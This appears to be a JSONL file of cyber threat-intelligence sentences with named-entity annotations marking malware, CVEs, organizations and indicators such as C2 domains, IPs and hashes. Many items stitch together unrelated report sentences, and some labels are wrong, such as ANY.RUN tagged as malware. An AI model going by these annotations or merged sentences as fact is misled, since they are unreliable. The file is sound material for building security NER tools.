In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine .", "spans": {"Malware: bait document": [[87, 100]], "Malware: Word document": [[150, 163]], "Vulnerability: CVE-2012-0158": [[184, 197]], "Malware: C&C server": [[380, 390]]}, "info": {"id": "cyberner_stix_valid_000549", "source": "cyberner_stix_valid"}} {"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers .", "spans": {"Vulnerability: Microsoft Office vulnerability": [[39, 69]], "Vulnerability: CVE-2017-11882": [[70, 84]], "Organization: Microsoft": [[143, 152]]}, "info": {"id": "cyberner_stix_valid_000550", "source": "cyberner_stix_valid"}} {"text": "In another case , Vcrodat was also used in an attack on a UK-based organization in the hospitality sector . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"Organization: hospitality sector": [[87, 105]], "Organization: FireEye": [[121, 128]], "Vulnerability: exploit": [[204, 211]], "Organization: Microsoft Office": [[212, 228]], "Vulnerability: vulnerabilities": [[229, 244]], "Malware: LOWBALL": [[295, 302]]}, "info": {"id": "cyberner_stix_valid_000551", "source": "cyberner_stix_valid"}} {"text": "Due to the specific nature of its activity , Perkele is distributed in a rather unusual way . Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer . An individual who goes by the name LZX in some online forums is believed to be the original author of ZxShell . 
Supply Chain Attack", "spans": {"Malware: Perkele": [[45, 52]], "Malware: ZxShell": [[303, 310]]}, "info": {"id": "cyberner_stix_valid_000552", "source": "cyberner_stix_valid"}} {"text": "PROMETHIUM distributed links through instant messengers , pointing recipients to malicious documents that invoked the exploit code to launch Truvasys on victim computers . The objective of the attacks is clearly espionage – they involve gaining access to top legislative , executive and judicial bodies around the world .", "spans": {}, "info": {"id": "cyberner_stix_valid_000553", "source": "cyberner_stix_valid"}} {"text": "So far we have identified the following behaviors : Sending device information to a remote command and control ( C2 ) server . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . If we decide to open the document , we see that the document is empty , but it requires the enabling of the macro . Spyware can even be used to track the device 's physical location and record from the camera or microphone .", "spans": {"Organization: Kaspersky": [[200, 209]], "Vulnerability: Adobe Flash Player zero-day vulnerability": [[243, 284]], "Vulnerability: CVE-2016-4117": [[287, 300]], "Malware: Spyware": [[530, 537]]}, "info": {"id": "cyberner_stix_valid_000554", "source": "cyberner_stix_valid"}} {"text": "In scenarios where wire fraud is not as lucrative an option , INDRIK SPIDER might use ransomware to monetize the compromise instead . 
In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack .", "spans": {"Organization: National Bank": [[155, 168]], "Organization: private banks": [[203, 216]]}, "info": {"id": "cyberner_stix_valid_000555", "source": "cyberner_stix_valid"}} {"text": "This routine is a form of generic and variable generator of DLL side-loading combinations . These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona . This DLL does not contain an export table and its entire functionality resides in the DllMain routine . • None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": {"Vulnerability: CVE-2022 - 41080": [[360, 376]], "Vulnerability: CVE-2022 - 41082": [[381, 397]]}, "info": {"id": "cyberner_stix_valid_000556", "source": "cyberner_stix_valid"}} {"text": "The malicious bash script components of the malware are hosted in Pastebin , with the profile name \" SYSTEMTEN \" , which is very similar to previous names used by the \" Rocke \" threat group . We continue to track the Wild Neutron group , which is still active as of June 2015 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000557", "source": "cyberner_stix_valid"}} {"text": "A second Quasar sample was also observed attacking this new victim :", "spans": {"Malware: Quasar": [[9, 15]]}, "info": {"id": "cyberner_stix_valid_000558", "source": "cyberner_stix_valid"}} {"text": "After the demise of Storm , it was replaced by another new botnet known as Waledac that also leveraged peer-to-peer communications . 
Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"Organization: Kaspersky": [[133, 142]], "Vulnerability: zero-day": [[195, 203]], "Vulnerability: CVE-2016-4117": [[220, 233]], "Malware: FinSpy": [[280, 286]]}, "info": {"id": "cyberner_stix_valid_000559", "source": "cyberner_stix_valid"}} {"text": "As will become evident in this report , this was not a one-off case but a recurring theme with the Dukes , in that they would rather continue with their operations as planned than retreat from operating under the spotlight .", "spans": {}, "info": {"id": "cyberner_stix_valid_000560", "source": "cyberner_stix_valid"}} {"text": "North Korea's Office 39 is involved in activities such as gold smuggling , counterfeiting foreign currency , and even operating restaurants . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": {"Organization: specific individuals": [[267, 287]]}, "info": {"id": "cyberner_stix_valid_000561", "source": "cyberner_stix_valid"}} {"text": "However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team . Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": {"Malware: BlackEnergy 3": [[39, 52]], "Organization: Microsoft": [[190, 199]], "Organization: users": [[250, 255]]}, "info": {"id": "cyberner_stix_valid_000562", "source": "cyberner_stix_valid"}} {"text": "Android services are components that can be made to execute independently in the background without the victim 's knowledge . 
In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . This second request ( Encoded Get System Information Request ) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers , which uses a four-byte XOR encoding .", "spans": {"System: Android": [[0, 7]], "Malware: Gh0st RAT": [[167, 176]]}, "info": {"id": "cyberner_stix_valid_000563", "source": "cyberner_stix_valid"}} {"text": "In this case however the targets were in different geopolitical regions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000564", "source": "cyberner_stix_valid"}} {"text": "Using AutoFocus , we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent .", "spans": {"Malware: Zebrocy": [[99, 106]]}, "info": {"id": "cyberner_stix_valid_000565", "source": "cyberner_stix_valid"}} {"text": "Network administrators are encouraged to apply the following recommendations , which can prevent as many as 85 percent of targeted cyber intrusions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000566", "source": "cyberner_stix_valid"}} {"text": "Yet irrespective of this , it is confusing why the previously-declared “ TEMP ” category was walked back as this has led to not small amount of confusion – in both technical and non-technical audiences – as to just what FireEye ’s blog post refers .", "spans": {"Organization: FireEye": [[220, 227]]}, "info": {"id": "cyberner_stix_valid_000567", "source": "cyberner_stix_valid"}} {"text": "This event triggers archive downloading thread . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . 
The United States and countries in Europe are targeted as well .", "spans": {"Vulnerability: CVE-2012-0158": [[178, 191]]}, "info": {"id": "cyberner_stix_valid_000568", "source": "cyberner_stix_valid"}} {"text": "For the past five months , Check Point researchers have quietly observed the China-based advertising company behind HummingBad in several ways , including by infiltrating the command and control servers it uses . These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections . APT33 : 8.26.21.119 [REDACTED].ddns.net . Its demands for ransom have exceeded 145 million , with collections exceeding 60 million .", "spans": {"Organization: Check Point": [[27, 38]], "Malware: HummingBad": [[116, 126]], "Indicator: 8.26.21.119": [[487, 498]], "Indicator: [REDACTED].ddns.net": [[499, 518]]}, "info": {"id": "cyberner_stix_valid_000569", "source": "cyberner_stix_valid"}} {"text": "The software manages the delivery of firmware updates over-the-air , the term used for transmission via a mobile network . We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations . Minzen : 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1 .", "spans": {"Malware: Minzen": [[232, 238]], "Indicator: 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1": [[241, 305]]}, "info": {"id": "cyberner_stix_valid_000570", "source": "cyberner_stix_valid"}} {"text": "However , relative to the total number of attacks , few are fully disclosed .", "spans": {}, "info": {"id": "cyberner_stix_valid_000571", "source": "cyberner_stix_valid"}} {"text": "App icons under which Asacub masks itself The APK files of the Trojan are downloaded from sites such as mmsprivate [ . 
CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) . If the system has been previously infected with a cryptominer , it also attempts to kill the running miner and all its related activities . Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": {"Malware: Asacub": [[22, 28]], "Organization: CTU": [[119, 122]], "Organization: Chilean Army": [[638, 650]]}, "info": {"id": "cyberner_stix_valid_000572", "source": "cyberner_stix_valid"}} {"text": "Kaspersky also published details on how Zebrocy has added the Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled , open source language . Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign .", "spans": {"Organization: Kaspersky": [[0, 9]], "Indicator: phishing email": [[242, 256]]}, "info": {"id": "cyberner_stix_valid_000573", "source": "cyberner_stix_valid"}} {"text": "The value used to replace GET_IMG_OBJECT comes from the JSON configuration . Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted . 0x111111111 : Hide “ Loveusd ” driver from the system kernel driver list . 0x22222222 : Securely delete an in-use or no-access target file-name . 0x44444444 : Unhook the ZwWriteFile API and hook KiFastCallEntry . 0x55555555 : Remove the ZxShell Image Load Notify routine . 0x88888888 : Set a special value called “ type ” in Windows registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverMain . 
Ukraine ’s Computer Emergency Response Team ( CERT - UA ) has attributed the July campaign to the threat actor group UNC1151 , as a part of the GhostWriter operational activities allegedly linked to the Belarusian government .", "spans": {"Malware: ZxShell": [[520, 527]], "System: Windows": [[608, 615]], "Organization: Ukraine ’s Computer Emergency Response Team": [[689, 732]], "Organization: CERT - UA": [[735, 744]], "Organization: the Belarusian government .": [[888, 915]]}, "info": {"id": "cyberner_stix_valid_000574", "source": "cyberner_stix_valid"}} {"text": "Despite the attention and public exposure of the toolset ’s technical details ( including IOCs ) to defenders , the Dukes still continued with their second wave of spear-phishing , including the continued use of CloudDuke .", "spans": {"Malware: CloudDuke": [[212, 221]]}, "info": {"id": "cyberner_stix_valid_000575", "source": "cyberner_stix_valid"}} {"text": "changeActivity command The webview injects are not hosted on the C2 , they are hosted on a completely different server . From January 2018 to March 2018 , through FireEye 's Dynamic Threat Intelligence , we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East . KHRAT : File Type : PE32 executable ( DLL ) Intel 80386, for MS Windows . 
It crafts configurable IEC-104 ASDU messages , to change the state of RTU IOAs to ON or OFF .", "spans": {"Organization: FireEye 's Dynamic Threat Intelligence": [[163, 201]], "Malware: KHRAT": [[381, 386]], "System: MS Windows": [[442, 452]]}, "info": {"id": "cyberner_stix_valid_000576", "source": "cyberner_stix_valid"}} {"text": "Threat groups often follow a path of least resistance to achieve their objective .", "spans": {}, "info": {"id": "cyberner_stix_valid_000577", "source": "cyberner_stix_valid"}} {"text": "However , artifacts of the attack wave such as Command and Control ( C&C ) servers are also used as early as April 2011 and against targets outside the chemical industry .", "spans": {}, "info": {"id": "cyberner_stix_valid_000578", "source": "cyberner_stix_valid"}} {"text": "Once executed on the machine , the code will deliver one of a number of sophisticated Remote Access Tools ( RATs ) , including AdobeARM , ATI-Agent , and MiniDionis .", "spans": {}, "info": {"id": "cyberner_stix_valid_000579", "source": "cyberner_stix_valid"}} {"text": "Although approximately half of the attacks focus on the US , other targeted regions include China , Japan , Southeast Asia , and the United Kingdom . com to establish free subdomains in their infrastructure .", "spans": {}, "info": {"id": "cyberner_stix_valid_000580", "source": "cyberner_stix_valid"}} {"text": "Table 5 describes the latest variant seen in AutoFocus . Another Chinese espionage group used a similar tool , CLASSFON , to covertly proxy network communications in 2011 . 
This whitepaper explores the tools - such as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , etc- of the Dukes , a well-resourced , highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making .", "spans": {"Malware: MiniDuke": [[218, 226]], "Malware: CosmicDuke": [[229, 239]], "Malware: OnionDuke": [[242, 251]], "Malware: CozyDuke": [[254, 262]]}, "info": {"id": "cyberner_stix_valid_000581", "source": "cyberner_stix_valid"}} {"text": "In addition to this , as reported by our peers at ESET last week , the group has also begun using a UEFI ( Unified Extensible Firmware Interface ) rootkit known as Lojax .", "spans": {"Organization: ESET": [[50, 54]], "Malware: Lojax": [[164, 169]]}, "info": {"id": "cyberner_stix_valid_000582", "source": "cyberner_stix_valid"}} {"text": "The group extensively uses long-running strategic web compromises ( SWCs ) , and relies on whitelists to deliver payloads to select victims .", "spans": {}, "info": {"id": "cyberner_stix_valid_000583", "source": "cyberner_stix_valid"}} {"text": "Threat Group 4127 Targets Hillary Clinton Presidential Campaign .", "spans": {}, "info": {"id": "cyberner_stix_valid_000584", "source": "cyberner_stix_valid"}} {"text": "We initially reported on Transparent Tribe and their UPDATESEE malware in our FireEye Intelligence Center in February 2016 . 
Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": {"Organization: FireEye Intelligence": [[78, 98]], "Indicator: MS PowerPoint document": [[153, 175]], "Vulnerability: CVE-2014-6352": [[201, 214]]}, "info": {"id": "cyberner_stix_valid_000585", "source": "cyberner_stix_valid"}} {"text": "The Shellbot script is added to run after the victim ’s system reboots , and scripts /a/upd , /b/sync/ , and /c/aptitude/ are added to the crontab .", "spans": {"Malware: Shellbot": [[4, 12]]}, "info": {"id": "cyberner_stix_valid_000586", "source": "cyberner_stix_valid"}} {"text": "The secondary payload was also written in Delphi and its developer configured it to communicate with its C2 server using HTTPS via the following URL : https://200.122.181.25/catalog/products/books.php .", "spans": {"Indicator: https://200.122.181.25/catalog/products/books.php": [[151, 200]]}, "info": {"id": "cyberner_stix_valid_000587", "source": "cyberner_stix_valid"}} {"text": "In order to achieve this , mike.jar connects to rootdaemon through various TCP ports that the daemon binds on some extraction routines for supported applications : Port 6202 : WhatsApp extraction service . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers . However , some of the documents also play an additional role in the attack . On Oct. 10 , 2023 , Citrix released a security bulletin for a sensitive information disclosure vulnerability ( CVE-2023 - 4966 ) impacting NetScaler ADC and NetScaler Gateway appliances .", "spans": {"System: WhatsApp": [[176, 184]], "Organization: Symantec": [[221, 229]], "Organization: customers": [[332, 341]], "Vulnerability: CVE-2023 - 4966": [[532, 547]]}, "info": {"id": "cyberner_stix_valid_000588", "source": "cyberner_stix_valid"}} {"text": "The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . 
Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation .", "spans": {"Vulnerability: CVE-2015-1641": [[73, 86]], "Organization: Dragos": [[89, 95]]}, "info": {"id": "cyberner_stix_valid_000589", "source": "cyberner_stix_valid"}} {"text": "Threat actors , especially those at the level of nation state , are seeking opportunities to attack these organizations , conducting elaborate , advanced operations to gain leverage , seize strategic assets , and collect information . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": {"Organization: Middle Eastern human rights activist": [[280, 316]]}, "info": {"id": "cyberner_stix_valid_000590", "source": "cyberner_stix_valid"}} {"text": "Our Umbrella telemetry shows that the majority of the request comes from Australia and the majority of the phone numbers infected have the international indicative for Australia . The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains . OceanLotus : plan.evillese.com:8888 11b4 . The dump files will start ' NSPPE- ' .", "spans": {"Indicator: plan.evillese.com:8888": [[338, 360]]}, "info": {"id": "cyberner_stix_valid_000591", "source": "cyberner_stix_valid"}} {"text": "Accessing the “ Cmd ” folder in the attacker ’ s email box Moreover , it can send a specified file or all the gathered data from the victim device via email . We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) . APT33 : bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab S-SHA2 DarkComet . 
The compromise of a system that is within the bot net is simply used to facilitate another attack .", "spans": {"Organization: financial organizations": [[247, 270]], "Malware: bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab S-SHA2 DarkComet": [[324, 405]], "Organization: system": [[428, 434]]}, "info": {"id": "cyberner_stix_valid_000592", "source": "cyberner_stix_valid"}} {"text": "The downloaded macro component includes a function called AutoClose() as well as two payloads embedded via Base64 encoded strings .", "spans": {}, "info": {"id": "cyberner_stix_valid_000593", "source": "cyberner_stix_valid"}} {"text": "This led to the discovery of three additional hacktools also signed using this certificate .", "spans": {}, "info": {"id": "cyberner_stix_valid_000595", "source": "cyberner_stix_valid"}} {"text": "Exodus One checks-in by sending a POST request containing the app package name , the device IMEI and an encrypted body containing additional device information . During the summer of 2018 , HELIX KITTEN actors were observed targeting entities in the Middle East — of note , targets appeared to be located in Bahrain and Kuwait . It also shows us an actor that puts effort in opsec by only using cloud providers . This technique has been used by the group for some time , with reports of INISafeWebSSO being leveraged dating as far back as 2018 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000596", "source": "cyberner_stix_valid"}} {"text": "Since discovering the operations of this group in 2018 , Outlaw continues to use scripts , codes , and commands that have been previously used and deployed .", "spans": {}, "info": {"id": "cyberner_stix_valid_000597", "source": "cyberner_stix_valid"}} {"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . 
Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 .", "spans": {"Vulnerability: 0day exploits": [[132, 145]], "Indicator: RTF files": [[193, 202]], "Vulnerability: CVE-2017-8570": [[214, 227]]}, "info": {"id": "cyberner_stix_valid_000598", "source": "cyberner_stix_valid"}} {"text": "The trojan will receive instructions from the C2 to spread . The research and ongoing tracking of APT10 by both PwC UK and BAE . OceanLotus : E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb Loader #1 . AdFind A publicly available tool that is used to query Active Directory .", "spans": {"Organization: PwC UK": [[112, 118]], "Organization: BAE": [[123, 126]], "Indicator: E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb": [[142, 223]]}, "info": {"id": "cyberner_stix_valid_000599", "source": "cyberner_stix_valid"}} {"text": "Lazarus is a very active attack group involved in both cyber crime and espionage . The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000600", "source": "cyberner_stix_valid"}} {"text": "Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations . 
In order to increase the likelihood of their malware successfully communicating home , Cyber Espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address .", "spans": {"Malware: HIGHNOON": [[22, 30]]}, "info": {"id": "cyberner_stix_valid_000601", "source": "cyberner_stix_valid"}} {"text": "This OnionDuke variant is related to the one seen during the summer of 2013 being spread via torrent files .", "spans": {"Malware: OnionDuke": [[5, 14]]}, "info": {"id": "cyberner_stix_valid_000602", "source": "cyberner_stix_valid"}} {"text": "Over the last year , the Sofacy group has increased its activity almost tenfold when compared to previous years , becoming one of the most prolific , agile and dynamic threat actors in the arena .", "spans": {}, "info": {"id": "cyberner_stix_valid_000603", "source": "cyberner_stix_valid"}} {"text": "The class “ org.starsizew.Ma ” is registered to intercept incoming SMS messages , the arrival of which will trigger the Android system to call its “ onReceive ” API . FireEye also reported on these attacks in a May 22 blog post . This function accepts three parameters : the input file , the output file and the arrKey ; arrKey is calculated thanks to GetKey function that accepts as input the Hexadecimal value of the Driver SN installed on the machine and returns the key as results . 
The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": {"System: Android": [[120, 127]], "Organization: FireEye": [[167, 174]], "Organization: listed on the leak site": [[569, 592]]}, "info": {"id": "cyberner_stix_valid_000604", "source": "cyberner_stix_valid"}} {"text": "Use best practices when updating software and patches by only downloading updates from authenticated vendor sites .", "spans": {}, "info": {"id": "cyberner_stix_valid_000605", "source": "cyberner_stix_valid"}} {"text": "Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims ; and a hash of the APK involved ( Android application ) was tagged in our sample feed for inspection . A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme . However , sometimes using public exploit code is quicker and more effective for malware authors . The RAT 's main binary is launched from \" C:\\Users\\%username%\\AppData\\Roaming\\BranScale\\client32.exe \" .", "spans": {"Organization: Kaspersky": [[0, 9]], "System: Android": [[130, 137]]}, "info": {"id": "cyberner_stix_valid_000606", "source": "cyberner_stix_valid"}} {"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . 
As far as we can judge from the data we have , in 2014 the criminal group behind Lurk seriously reduced its activity and \" lived from hand to mouth \" , attacking anyone they could , including ordinary users .", "spans": {"Malware: MS Word document": [[132, 148]], "Malware: Lurk": [[260, 264]]}, "info": {"id": "cyberner_stix_valid_000607", "source": "cyberner_stix_valid"}} {"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits .", "spans": {"Organization: Unit 42": [[29, 36]], "Malware: EPS files": [[109, 118]], "Vulnerability: CVE-2015-2545": [[133, 146]], "Vulnerability: CVE-2017-0261": [[151, 164]], "Organization: Tibetan Parliamentarians": [[209, 233]], "Indicator: malicious attachments": [[267, 288]], "Malware: documents bearing exploits": [[304, 330]]}, "info": {"id": "cyberner_stix_valid_000608", "source": "cyberner_stix_valid"}} {"text": "These election attacks signaled a change of tactics on the part of APT28 , moving away from their prior low-key intelligence gathering towards more overt activity , seemingly intended to destabilize and disrupt victim organizations and countries .", "spans": {}, "info": {"id": "cyberner_stix_valid_000609", "source": "cyberner_stix_valid"}} {"text": "Through open-source research , CTU researchers identified the owners of 66 of the targeted email addresses .", "spans": {"Organization: CTU": [[31, 34]]}, "info": {"id": "cyberner_stix_valid_000610", "source": "cyberner_stix_valid"}} {"text": "It was recently reported that Ismail Haniyeh , the head of Hamas ’ political Bureau , had a falling-out with the Egyptian government over his visit to Tehran to participate in General Qasem Soleimani ’s funeral , following Soleimani ’s assassination .", 
"spans": {"Organization: Hamas": [[59, 64]]}, "info": {"id": "cyberner_stix_valid_000611", "source": "cyberner_stix_valid"}} {"text": "It can also be downloaded by a specific command . In fact , according to reports of various security vendors , OceanLotus also attacked several countries , including Cambodia , Thailand , Laos , even some victims in Vietnam , like opinion leaders , media , real estate companies , foreign enterprises and banks . SilverTerrier is a Nigerian threat group that has been seen active since 2014 .", "spans": {"Organization: media": [[249, 254]], "Organization: real estate companies": [[257, 278]], "Organization: foreign enterprises": [[281, 300]], "Organization: banks": [[305, 310]]}, "info": {"id": "cyberner_stix_valid_000612", "source": "cyberner_stix_valid"}} {"text": "Retrieve the browsing history and bookmarks from Chrome and SBrowser ( the browser shipped with Samsung phones ) . Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others . JhoneRAT : https://twitter.com/jhone87438316 . 
They are usually motivated by a cause of some sort , such as highlighting human rights or alerting a large corporation to their system vulnerabilities .", "spans": {"System: Chrome": [[49, 55]], "System: SBrowser": [[60, 68]], "Organization: Samsung": [[96, 103]], "Organization: Symantec": [[115, 123]], "Malware: Starloader files": [[146, 162]], "Malware: AdobeUpdate.exe": [[175, 190]], "Malware: AcrobatUpdate.exe": [[193, 210]], "Malware: INTELUPDATE.EXE": [[217, 232]], "Malware: JhoneRAT": [[248, 256]], "Indicator: https://twitter.com/jhone87438316": [[259, 292]]}, "info": {"id": "cyberner_stix_valid_000613", "source": "cyberner_stix_valid"}} {"text": "Each of these elements makes TA505 a magnifying lens through which to consider the framework employed by many modern threat actors .", "spans": {}, "info": {"id": "cyberner_stix_valid_000614", "source": "cyberner_stix_valid"}} {"text": "Adups addressed the issue in a Nov. 16 news release , writing that some products made by BLU were updated in June with a version of its FOTA that had actually been intended for other clients who had requested an ability to stop text spam . In addition , a current ANY.RUN playback of our observed Elise infection is also available . C2 : news.softfix.co.kr .", "spans": {"Organization: Adups": [[0, 5]], "Organization: BLU": [[89, 92]], "System: FOTA": [[136, 140]], "Malware: ANY.RUN": [[264, 271]], "Malware: Elise": [[297, 302]], "Indicator: news.softfix.co.kr": [[338, 356]]}, "info": {"id": "cyberner_stix_valid_000615", "source": "cyberner_stix_valid"}} {"text": "Oddly enough they also use it to make fun of the AV community , sharing detection screenshots from VirusTotal ( thus leaking IoC ) and even engaging in discussions with malware researchers directly The following screenshot shows tweets from their advertisement campaign : That unusual behavior could be explained by the combination of the need for attention and a probable lack of experience . 
As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces . Malware overlaps between APT38 and TEMP.Hermit highlight the shared development resources accessible by multiple operational groups linked to North Korean state-sponsored activity .", "spans": {"Organization: VirusTotal": [[99, 109]], "Organization: ESET": [[412, 416]], "Organization: military": [[553, 561]]}, "info": {"id": "cyberner_stix_valid_000616", "source": "cyberner_stix_valid"}} {"text": "We have detected a total of 17 C & C servers on 4 different domains , which probably means the bad guys are quite familiar with what redundancy is . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . The executable variant of Helminth is installed with a dropper Trojan that we are tracking as the HerHer Trojan .", "spans": {"Vulnerability: zero day exploit": [[201, 217]], "Vulnerability: CVE-2016-0147": [[220, 233]], "Malware: Helminth": [[291, 299]], "Malware: dropper Trojan": [[320, 334]], "Malware: HerHer Trojan": [[363, 376]]}, "info": {"id": "cyberner_stix_valid_000617", "source": "cyberner_stix_valid"}} {"text": "Bouncing Golf ’ s operators also try to cover their tracks . Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . In order to trick blue teams and other DFIR analysts , the operators created fake HTTP 302 redirection to various Google services on their C2s servers . 
All they need to do is deploy and configure the provided phishing kit with an API key .", "spans": {"Malware: Bouncing Golf": [[0, 13]], "Vulnerability: zero-day vulnerability": [[89, 111]], "Organization: Google": [[382, 388]]}, "info": {"id": "cyberner_stix_valid_000618", "source": "cyberner_stix_valid"}} {"text": "If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , the adversaries identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": {"Malware: OwaAuth": [[7, 14]], "Malware: ChinaChopper": [[176, 188]]}, "info": {"id": "cyberner_stix_valid_000619", "source": "cyberner_stix_valid"}} {"text": "However , it also targets applications from Romania , Ireland , India , Austria , Switzerland , Australia , Poland and the USA . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . We also found a second IRC bot called MPK using the same IP for its C2 server that a Leash sample was hosted on .", "spans": {"Malware: RTF": [[134, 137]], "Vulnerability: CVE-2017_1882": [[157, 170]], "Malware: eqnedt32.exe": [[174, 186]], "Malware: IRC bot": [[212, 219]], "Malware: MPK": [[227, 230]], "Malware: Leash sample": [[274, 286]]}, "info": {"id": "cyberner_stix_valid_000620", "source": "cyberner_stix_valid"}} {"text": "WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER ! Group-IB detected the first incidents relating to Silence in June 2016 . Both used DocuSign decoy documents with different macros . Monitor newly executed processes that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"Organization: Group-IB": [[76, 84]]}, "info": {"id": "cyberner_stix_valid_000621", "source": "cyberner_stix_valid"}} {"text": "In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . 
Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality .", "spans": {"Vulnerability: CVE-2019-0604": [[75, 88]], "Organization: Cyber Security Center": [[141, 162]], "Organization: Canadian Center": [[171, 186]], "Malware: Leader": [[208, 214]], "Malware: Bookworm": [[218, 226]], "Malware: Trojan": [[284, 290]], "Indicator: DLLs": [[322, 326]]}, "info": {"id": "cyberner_stix_valid_000622", "source": "cyberner_stix_valid"}} {"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . Their next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents .", "spans": {"Malware: Silence.MainModule": [[0, 18]], "Malware: CMD.EXE": [[96, 103]], "Organization: government office": [[351, 368]], "Indicator: Word documents": [[423, 437]]}, "info": {"id": "cyberner_stix_valid_000623", "source": "cyberner_stix_valid"}} {"text": "The trojan will register the SMS handler , which will forward the 